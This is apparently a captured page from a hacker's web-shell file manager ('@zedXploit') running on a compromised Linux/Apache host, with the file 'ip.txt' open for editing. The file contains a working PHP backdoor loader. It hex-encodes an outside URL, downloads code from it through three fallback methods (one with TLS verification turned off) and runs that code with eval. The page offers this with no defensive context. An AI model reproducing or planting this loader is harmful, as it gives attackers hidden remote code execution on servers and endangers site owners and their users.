🌙 File Manager - @zedXploit
PHP:
7.4.33
Server:
Apache
OS:
Linux 4.18.0-553.111.1.lve.el8.x86_64
User:
zivc4947
Navigate
Upload:
Upload
New File
New Folder
Editing: ip.txt
<?php error_reporting(E_ALL); ini_set('display_errors', 1); ini_set('display_startup_errors', 1); $hexUrl = '68747470733a2f2f72757364692e66756e2f7261772f613238313062'; function hexToString($hex) { $str = ''; for ($i = 0; $i < strlen($hex) - 1; $i += 2) { $str .= chr(hexdec($hex[$i] . $hex[$i + 1])); } return $str; } $url = hexToString($hexUrl); function downloadWithFileGetContents($url) { if (ini_get('allow_url_fopen')) { return @file_get_contents($url); } return false; } function downloadWithCurl($url) { if (function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $data = curl_exec($ch); curl_close($ch); return $data; } return false; } function downloadWithFopen($url) { $result = false; if ($fp = @fopen($url, 'r')) { $result = ''; while ($data = fread($fp, 8192)) { $result .= $data; } fclose($fp); } return $result; } $phpScript = downloadWithFileGetContents($url); if ($phpScript === false) { $phpScript = downloadWithCurl($url); } if ($phpScript === false) { $phpScript = downloadWithFopen($url); } if ($phpScript === false) { die("Failed to download PHP script from URL using all available methods."); } if (strpos($phpScript, '<?php') === false) { $phpScript = '<?php ' . $phpScript; } try { eval('?>' . $phpScript); } catch (ParseError $e) { die("Syntax error in the fetched code: " . $e->getMessage()); } ?>
Save Changes
Cancel
Create New File
Create New Folder